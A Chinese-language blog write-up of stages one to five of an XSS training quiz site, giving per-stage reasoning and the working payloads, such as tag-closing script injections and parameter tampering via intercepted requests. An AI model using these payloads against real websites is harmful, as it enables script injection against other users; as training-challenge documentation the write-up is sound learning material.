記XSS的闖關解題思路

記一次本身的闖關記錄，地址：http://xss-quiz.int21h.jp

0x01 第一關

思路：先輸入test ，而後查看源文件，看看效果

 發現標籤,<b>考慮將標籤閉合

輸入代碼："</b><scriPT>alert(document.domain)</scriPT>   成功彈框！！

0x02 第二關

一樣，咱們先查看源文件

發現此次不是b標籤了，同樣的思路，進行閉合

輸入代碼："><scriPT>alert(document.domain)</scriPT>  成功彈框！！

0x03 第三關

輸入上一段代碼，發現沒有效果，查看源代碼，發現被過濾編碼了，因而輸入!<>/" 發現除了！和/ 均被編碼，下面嘗試抓包看看

發現第二個參數沒有過濾，進行改包。

<scriPT>alert(document.domain)</scriPT>      成功彈框！！

0x04 第四關  

思路：

1、先試用第三題成功的代碼查看效果<scriPT>alert(document.domain)</scriPT> ，再查看源代碼，發現過濾，進行抓包。
2、將<scriPT>alert(document.domain)</scriPT>  寫到第二個參數進行改包發送，再查看源代碼，發現依然過濾。後面還有一個P3的參數

3、將<scriPT>alert(document.domain)</scriPT>  寫到第三個參數進行改包發送，發現依然不成功，查看源代碼，此次沒有過濾，考慮前面的思路閉合標籤

4、將」><scriPT>alert(document.domain)</scriPT> 寫到第三個參數，彈窗成功。

 

0x05 第五關

 

將第四關的」><scriPT>alert(document.domain)</scriPT>寫入，發現有了字符數的限制。

 

開啓抓包，輸入」><scriPT>alert(document.domain)</scriPT>，成功彈窗。

 

有空就更新，先暫時到這裏，下次繼續!!!!!!!

http://xss-quiz.int21h.jp/stage-no6.php?sid=5ac2954a21cbb5328e838161754f3b398ad8962c